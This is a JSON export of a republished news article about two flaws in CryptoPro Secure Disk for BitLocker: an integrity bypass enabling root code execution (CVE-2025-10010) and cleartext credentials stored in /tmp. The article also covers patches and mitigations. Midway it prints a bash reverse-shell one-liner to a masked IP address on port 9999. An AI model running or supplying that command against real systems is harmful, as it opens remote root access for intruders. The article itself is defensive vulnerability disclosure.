{"id":10924,"date":"2026-02-25T10:03:42","date_gmt":"2026-02-25T10:03:42","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/02\/25\/multiple-vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker-allow-root-access-and-credential-theft\/"},"modified":"2026-02-25T10:03:42","modified_gmt":"2026-02-25T10:03:42","slug":"multiple-vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker-allow-root-access-and-credential-theft","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/02\/25\/multiple-vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker-allow-root-access-and-credential-theft\/","title":{"rendered":"Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft"},"content":{"rendered":"<p>    Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Multiple vulnerabilities have been discovered in CryptoPro Secure Disk (CPSD) for BitLocker, a widely used encryption solution.<\/p>\n<p>These flaws could allow an attacker with physical access to a device to <a href=\"https:\/\/cybersecuritynews.com\/clickfix-abuses-legitimate-homebrew-workflow\/\" target=\"_blank\" rel=\"noreferrer noopener\">gain persistent root access and steal sensitive credentials<\/a>.<\/p>\n<p>The issues identified by security researchers at SEC Consult Vulnerability Lab highlight significant risks for organizations that rely on this software for data protection.<\/p>\n<figure class=\"wp-block-table is-style-stripes\">\n<table class=\"has-fixed-layout\">\n<thead>\n<tr>\n<th>CVE<\/th>\n<th>CVSS<\/th>\n<th>Details<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><strong>CVE-2025-10010<\/strong><\/td>\n<td>N\/A<\/td>\n<td>Integrity bypass enables root code execution.<\/td>\n<\/tr>\n<tr>\n<td>N\/A<\/td>\n<td>N\/A<\/td>\n<td>Cleartext <code>\/tmp<\/code> data exposes credentials.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\" id=\"h-integrity-validation-bypass\"><strong>Integrity Validation Bypass<\/strong><\/h2>\n<p>The first vulnerability, designated as <a href=\"https:\/\/cybersecuritynews.com\/gitlab-vulnerabilities-enables-2fa-bypass-and-dos-attacks\/\" target=\"_blank\" rel=\"noreferrer noopener\">CVE-2025-10010, involves an integrity validation bypass.<\/a><\/p>\n<p>CryptoPro Secure Disk boots a minimal Linux operating system to authenticate users, then <a href=\"https:\/\/cybersecuritynews.com\/bitunlocker-bypass-bitlocker\/\" target=\"_blank\" rel=\"noreferrer noopener\">decrypts the Windows partition with BitLocker<\/a>.<\/p>\n<p>This Linux system resides on an unencrypted partition, accessible to anyone who can physically reach the hard drive or boot the system from an external medium.<\/p>\n<p>While the system uses the Linux kernel\u2019s <a href=\"https:\/\/cybersecuritynews.com\/windows-11-pcs-fail-to-shut-down\/\" target=\"_blank\" rel=\"noreferrer noopener\">Integrity Measurement Architecture (IMA) to verify files<\/a>, researchers found that IMA does not validate certain configuration files.<\/p>\n<p>bash -c \u2018exec bash -i &amp;&gt;\/dev\/tcp\/192.168.XXX.XXX\/9999 &lt;&amp;1&#8242; &amp;<\/p>\n<p>By manipulating these files, an attacker can <a href=\"https:\/\/cybersecuritynews.com\/imunify-ai-bolit-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">execute arbitrary code with root privileges<\/a>. This could allow them to plant a backdoor and monitor or access data during execution without triggering any system errors.<\/p>\n<figure class=\"wp-block-table is-style-stripes\">\n<table class=\"has-fixed-layout\">\n<thead>\n<tr>\n<th>Product<\/th>\n<th>Vulnerable Versions<\/th>\n<th>Fixed Versions<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>CPSD CryptoPro Secure Disk<\/td>\n<td>&lt; 7.6.6 \/ &lt; 7.7.1<\/td>\n<td>7.6.6 \/ 7.7.1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\" id=\"h-cleartext-storage-of-sensitive-data\"><strong>ClearText Storage of Sensitive Data<\/strong><\/h2>\n<p>The second issue concerns the storage of <a href=\"https:\/\/cybersecuritynews.com\/hpe-aruba-vulnerabilities\/\" target=\"_blank\" rel=\"noreferrer noopener\">sensitive data in clear text<\/a>. When users forget their credentials, CryptoPro Secure Disk offers an online support feature that connects to a predefined network.<\/p>\n<p><a href=\"https:\/\/sec-consult.com\/vulnerability-lab\/advisory\/multiple-vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">According to SEC Consult<\/a>, to facilitate this connection, the system stores necessary secrets, such as certificates and passwords, in cleartext within the temporary \u2018\/tmp\u2019 folder.<\/p>\n<p>If an attacker has already <a href=\"https:\/\/cybersecuritynews.com\/voidlink-linux-c2-highlights-llm-generated-malware\/\" target=\"_blank\" rel=\"noreferrer noopener\">gained access to the Linux environment<\/a>, perhaps through the first vulnerability, they can easily read these files.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhYngxHq2EvbNlkstm8H02I2Y4EKs6dMk0_O67JvzK8dLpmy8YKlOQOgHgOUnRY3qb03FsJESdA-6cTNy6slNRFl2OMKE3O4sA1cS4F2p8Q2XwNZ15rL7UwjnRnK1TEpaTEtl4Pvrfd_ewkXMuWXlCyamvlC8edV192dOUlq6DWdC-sWSxyD9Mnj-h3dN4\/s1600\/Screenshot%25202026-02-25%2520123055%2520%25281%2529.webp?ssl=1\" alt=\"Cleartext certificate credentials expose WLAN access and enable 802.1X bypass(source : sec-consult)\"><figcaption class=\"wp-element-caption\">Cleartext certificate credentials expose WLAN access and enable 802.1X bypass(source : sec-consult)<\/figcaption><\/figure>\n<p>This information could then be used to access internal networks or bypass network access controls, further compromising the organization\u2019s infrastructure.<\/p>\n<p>The vendor, CPSD, was notified of these issues in June 2025 and has since provided patches. Versions 7.6.6 and 7.7.1 address the vulnerabilities.<\/p>\n<p>Organizations using CryptoPro Secure Disk should update their software immediately. If updating is not immediately possible, the vendor recommends encrypting the PBA partition, a feature available since version 7.6.0.<\/p>\n<p>Starting with version 7.7, this encryption is enabled by default, mitigating the risk of unauthorized file modifications.<\/p>\n<p>SEC Consult also advises organizations to conduct thorough security reviews of their encryption solutions to identify and address any other potential weaknesses.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 90%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker\/\">Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Abinaya<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft Multiple vulnerabilities have been discovered in CryptoPro Secure Disk (CPSD) for BitLocker, a widely used encryption solution. These flaws could allow an attacker with physical access to a device to gain persistent root access and steal sensitive credentials. The issues [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[533,2015,129,63,416],"tags":[130],"class_list":["post-10924","post","type-post","status-publish","format-standard","hentry","category-bitlocker","category-cve-vulnerabilities","category-cyber-security","category-cyber-security-news","category-vulnerabilities","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/10924"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=10924"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/10924\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=10924"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=10924"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=10924"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}